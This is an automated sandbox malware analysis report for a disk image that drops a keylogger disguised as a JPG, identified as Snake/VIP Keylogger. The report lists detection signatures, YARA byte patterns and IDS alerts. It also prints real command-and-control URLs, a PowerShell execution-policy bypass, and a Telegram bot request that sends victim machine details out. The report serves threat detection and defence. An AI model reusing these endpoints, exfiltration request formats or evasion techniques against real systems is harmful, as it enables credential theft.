Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
g1TLK7mbZD.img

Overview

General Information

Sample name:g1TLK7mbZD.img
Analysis ID:1541369
MD5:213a8ce5aaa962f33a78f6053f6956ba
SHA1:339df70ab6152e4b20d81d4180943fc6fcb1f752
SHA256:5d4a99440308479e4b97797fc6518240e1617df62bb938d3f735026931d7bed3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Suspicious PowerShell Parameter Substring
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cmd.exe (PID: 3484 cmdline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1728 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • udfs.sys (PID: 4 cmdline: MD5: 26D2727935221EFB0063B43A74B375BE)
  • 9236-pagaconferma-jpg.exe (PID: 8268 cmdline: "D:\9236-pagaconferma-jpg.exe" MD5: 1AEFAA71B8996D22CAD66A84A7F279A0)
    • svchost.exe (PID: 8376 cmdline: "D:\9236-pagaconferma-jpg.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.31560050751.0000000003570000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 EA 88 44 24 2B 88 44 24 2F B0 09 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000008.00000002.33967794321.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x1300:$s3: 83 EC 38 53 B0 EA 88 44 24 2B 88 44 24 2F B0 09 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1fdd0:$s5: delete[]
    • 0x1f288:$s6: constructor or from DllMain.
    00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        Click to see the 32 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Suspicious PowerShell Parameter Substring
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3484, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), ProcessId: 1728, ProcessName: powershell.exe
        Sigma detected: Execution of Suspicious File Type Extension
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\udfs.sys, NewProcessName: C:\Windows\System32\drivers\udfs.sys, OriginalFileName: C:\Windows\System32\drivers\udfs.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: udfs.sys
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "D:\9236-pagaconferma-jpg.exe" , CommandLine: "D:\9236-pagaconferma-jpg.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "D:\9236-pagaconferma-jpg.exe" , ParentImage: \Device\CdRom0\9236-pagaconferma-jpg.exe, ParentProcessId: 8268, ParentProcessName: 9236-pagaconferma-jpg.exe, ProcessCommandLine: "D:\9236-pagaconferma-jpg.exe" , ProcessId: 8376, ProcessName: svchost.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3484, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), ProcessId: 1728, ProcessName: powershell.exe
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: "D:\9236-pagaconferma-jpg.exe" , CommandLine: "D:\9236-pagaconferma-jpg.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "D:\9236-pagaconferma-jpg.exe" , ParentImage: \Device\CdRom0\9236-pagaconferma-jpg.exe, ParentProcessId: 8268, ParentProcessName: 9236-pagaconferma-jpg.exe, ProcessCommandLine: "D:\9236-pagaconferma-jpg.exe" , ProcessId: 8376, ProcessName: svchost.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T18:36:03.459445+020028033053Unknown Traffic192.168.11.2049792104.21.67.152443TCP
        2024-10-24T18:36:04.219404+020028033053Unknown Traffic192.168.11.2049794104.21.67.152443TCP
        2024-10-24T18:36:06.972892+020028033053Unknown Traffic192.168.11.2049800104.21.67.152443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-24T18:36:01.522384+020028032742Potentially Bad Traffic192.168.11.2049790158.101.44.24280TCP
        2024-10-24T18:36:03.053396+020028032742Potentially Bad Traffic192.168.11.2049790158.101.44.24280TCP
        2024-10-24T18:36:03.774476+020028032742Potentially Bad Traffic192.168.11.2049793158.101.44.24280TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeReversingLabs: Detection: 18%
        Multi AV Scanner detection for submitted file
        Source: g1TLK7mbZD.imgReversingLabs: Detection: 31%
        Machine Learning detection for dropped file
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeJoe Sandbox ML: detected

        Location Tracking

        barindex
        Tries to detect the country of the analysis system (by using the IP)
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49791 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49807 version: TLS 1.2
        Source: Binary string: _.pdb source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: 9236-pagaconferma-jpg.exe, 00000007.00000003.31555020352.0000000004900000.00000004.00001000.00020000.00000000.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000003.31558367702.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: 9236-pagaconferma-jpg.exe, 00000007.00000003.31555020352.0000000004900000.00000004.00001000.00020000.00000000.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000003.31558367702.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 158.101.44.242 80Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.67.152 443Jump to behavior
        Uses the Telegram API (likely for C&C communication)
        Source: unknownDNS query: name: api.telegram.org
        Yara detected Generic Downloader
        Source: Yara matchFile source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2024/10/2024%20/%2020:04:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
        Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
        Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
        Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownDNS query: name: checkip.dyndns.org
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49793 -> 158.101.44.242:80
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49790 -> 158.101.44.242:80
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49794 -> 104.21.67.152:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49800 -> 104.21.67.152:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49792 -> 104.21.67.152:443
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49791 version: TLS 1.0
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.org
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/154.16.192.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2024/10/2024%20/%2020:04:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: svchost.exe, 00000008.00000002.33970405843.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
        Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
        Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 24 Oct 2024 16:36:10 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
        Source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.31858413420.0000000003285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
        Source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
        Source: svchost.exe, 00000008.00000003.31665166705.000000000328F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.31675311378.000000000328F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968691053.0000000003291000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
